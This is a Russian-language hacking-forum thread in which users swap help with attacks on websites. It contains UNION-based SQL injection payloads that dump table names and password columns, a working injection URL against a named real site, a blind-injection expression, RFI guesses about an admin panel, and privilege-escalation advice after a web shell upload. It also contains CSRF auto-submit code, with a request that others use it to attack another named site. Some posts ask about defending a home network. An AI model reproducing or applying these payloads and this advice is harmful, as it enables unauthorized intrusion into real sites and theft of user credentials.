Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. VK_unreg

    VK_unreg Banned

    Joined:
    29 Nov 2010
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    да ты порутал этот серв :D ничего с этого не поимеешь бро
     
  2. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17--
    как это можно обойти?
     
  3. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652

    Попробуй следующие запросы:

    id=-7888+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables limit n,1+--+

    id=-7888+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=[таблица] или 0x[hex таблицы] limit n,1+--+


    Попробуй перебор стандартных пользовательских таблиц:

    id=-7888+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17 from [таблица пользователей]+--+

    Также иногда помогает hex: 0x[user],0x[password]
     
    1 person likes this.
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    id=-7888+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17--

    пропускает ?
     
    _________________________
  5. sfinxs

    sfinxs New Member

    Joined:
    20 Feb 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето? spasibo
     
  6. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Команда chmod
    +x - позволяет только запускать скрипт.
    +rx - позволяет запускать и просматривать содержимое.

    Также посмотрите и почитайте числовую установку прав доступа.
     
  7. sfinxs

    sfinxs New Member

    Joined:
    20 Feb 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    спс. а где ето ? на счет прав доступа неполучаеться поменять . пишет : админ - все доступы . ГРОУП - read only . другие : вообше нет. надо BIND делать и с netcat подключаться или по другому можно? )
     
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Попробуйте повысить права:

    Версия операционной системы --> exploit
     
  9. sfinxs

    sfinxs New Member

    Joined:
    20 Feb 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    самописный у него движок . ненаходит сканнер . Индекс.хтмл файла нету вообше. только индех.пх . где мануал какой нить ?
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    движок тут вобще не причём, под словами ,,Версия операционной системы --> exploit,, имеется в виду порутать серв
    ну понятное дело, все на пхп написано

    мануал по чём?
     
  11. sfinxs

    sfinxs New Member

    Joined:
    20 Feb 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    о том как повысить права или експлоит ОС где скачать и как юзать . Но может просто способ есть как присвоить себе права ? kak
     
  12. Hracid

    Hracid New Member

    Joined:
    18 Nov 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток, господа!
    есть у меня ряд вопросов по защите/атаке. чисто гипотетических. т.к. в качестве хобби решил заняться защитой информации. всегда меня это привлекало.

    дома на 2х ноута стоит windows 7. "лицензия", всегда свежие обновления от мелко-мягких, над этим всем неустанно бдит касперский со свежими базами.
    сеть организована следующим образом, есть модем(он же роутер) в режиме моста. внешний IP динамический.

    под виртуалкой на одном из ноутов развернут Kali Linux.

    собственно эксперементы в локальной сети уже провел все что смог придумать, да и это не особо интересно. т.к. в домашней локалке только я и жена.
    опробовал в локальной сети:
    1. dns spoofing. рабтает на ура =) в содружестве с s.e.t. дает просто обалденные результаты.
    2. social engeneer toolkit(классная вещь в прямых руках)(получил пароль жены минут за 15... не особое достижение при том что я и так все её пароли знаю. но все равно было приятно что метод работает)
    3. различные снифера в пачке с подменой ARP таблиц. (работает на ура!)
    4. попробовал metasploit/armitage(вещь конечно грамотная, при наличии открытых уязвимостей), но даже при их наличии выпиливается начисто антивирусом(криптовать пэйлоады пробовал, но видимо руки кривые). специально ставил java машину старой версии, с уязвимостю, но попытка эксплуатации была присечена самой виндой... в моем случае софтина оказалось абсолютно не эффективной.

    ну это все лирика. в локалке мне по хорошему бояться нечего. в виду ограниченого круга пользователей локальной сети.

    меня больше волнуют атаки из вне. допустим меня хотят взломать(получить доступ к почте/рабочей станции разницы нет). чего мне стоит опасаться? мне на ум приходят следующие атаки:
    1. средствами СИ(или еще как) меня заманивают на страницу со зловредным скриптом использующем уязвимость в java или flash или браузере и т.д. я перехожу, скрипт и пэйлоад не пропалились антивирусом. у атакующего профит, он имеет полный контроль над системой и всем что в ней есть.
    2. опять же средствами СИ меня заманивают на фэйковый сайт и я как полный лохопет сливаю свои пароли от ресурса. (маловероятно конечно, но и такое возможно, вдруг я буду пьян или упорот)
    3. мне присылают вредоноса(батник, powerShell, exe'шник, pdf, flash, офисный документ, что еще можно прислать?) которого я конечно запущу в основной системе а не под виртуалкой с XP...
    4. XSS на всеми нами любимом mail.ru(ради интереса поискал при помощи 3х разных сканеров из набора kali) нашел 0. но особо ин не старался. да и чревато это.

    если вам есть что добавить по поводу атак из вне, дописывайте ;) мне как раз это и интересно. какие еще варианты атак существуют для получения доступа к компу или кражи почты? почта mail.ru или gmail. другим думаю мало кто сейчас пользуется. корпоративная почта не всчет, пусть об этом голова у службы безопасности болит.

    меня интересуют ситуации с атакой на конкретную цель. т.е. в данном случае меня. брутфорс не предлагать. это слишком очевидно.
     
    #22412 Hracid, 14 Aug 2013
    Last edited: 14 Aug 2013
  13. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    есть сайтик один, в его админке проходя по адресу admin/index.php , сразу в адресной строке показывается /admin/index.php?env=-login:m0--1--s- . Тут получилось добиться пары ошибок:
    Если после /admin/index.php?env=- ставить любой символ, допустим 123 , то будет ошибка:

    Fatal Error: Cannot include "123" - file does not exist in /home/***/public_html/core/kernel/nparser/nparser.php on line 392

    Если запрос ставить так /admin/index.php?env=-login:antichat, то получим ошибку:

    Fatal Error: Configuration file for prefix antichat is unknown in /home/****/public_html/core/kernel/utility/unit_config_reader.php on line 905

    Если вместо admin/index.php?env=-login поставить любые другие символы, то переадресует на /admin/index.php?env=-login:m0--1--s-
    Вопрос знатокам, что тут можно попробовать? я так понимаю php inj может быть, с ней не знаком, какие действия попробовать предпринять?
     
    #22413 Br@!ns, 16 Aug 2013
    Last edited: 16 Aug 2013
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    RFI там, если более фильтраций нет.
    Может быть идет через explode разделение, эксперементировать на самом сайте надо. Ссылку в студию!
     
  15. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Здравствуйте, часто встречаются сайты в которых blind inj дает одинаковый ответ при true и false выражениях, но при некорректном sql запросе страница меняется. Использовать time based inj получается далеко не всегда. И что же делать? Я знаю про такой тип атаки - and if((substring(version(),1,1)=5),1,(select 1 union select 2)) При true выражении в первом операнде ошибки не будет. Соответственно при false mysql будет выдавать ошибку - страница поменяется. Все это конечно хорошо руками, но как данное дело настроить на sql map, что бы автоматизировать данный процесс? Мб кто нибудь уже пробовал. Заранее спасибо ребят.
     
  16. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Не могу подобрать кол-во столбцов
    Code:
    http://crimea.ua/category.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
    знатоки подскажите
     
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    А почему вы считаете, что здесь есть инъекция? Ни один тест её не подтверждает, тем более мы знаем по именам функций что это mysql.

    А вот на соседней странице она имеется:
    Code:
    http://crimea.ua/section.php?CatId=9&SecId=75+and+1=2%29+union+select+1,2,3,version%28%29,5+--+
    
     
    #22417 randman, 17 Aug 2013
    Last edited: 17 Aug 2013
    1 person likes this.
  18. nikitos2020

    nikitos2020 New Member

    Joined:
    6 Aug 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    салют, у меня такая проблема при попытке использовать XSRF, не могу сделать автовыполнения запроса так как в строке <form method="post" action="/profile" class="reg_form"> нет параметра name который должен быть вписан тут <html><body onload="document.forms['NAME'].submit();"> можете помочь? заранее спс
     
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Если вы используете document.forms, вам надо задавать name форме или искать её по id. При статическом задании более-универсален такой варинт:
    PHP:
    <form id="test" ...>...</form>
    <
    script>
    document.getElementById('test').submit(); 
    </script>

     
    #22419 randman, 18 Aug 2013
    Last edited: 18 Aug 2013
  20. nikitos2020

    nikitos2020 New Member

    Joined:
    6 Aug 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    не бро не прокатило((( может сам попробуешь? https://euroits.com/profile там зарегаться придётся, уязвимость в редактировании профиля, если подставить своё произвольно значение name или id форма несрабатывает, тебя просто перебрасывает на страницу изменения данных, но сами данные не изменины(
    P.S при регистрации в поле кошелёк можно ввести "U1234567". попробуй заюзать XSRF если тебе не трудно. у меня на всех таких проектов получалось, но вот с этим беда(
     
Thread Status:
Not open for further replies.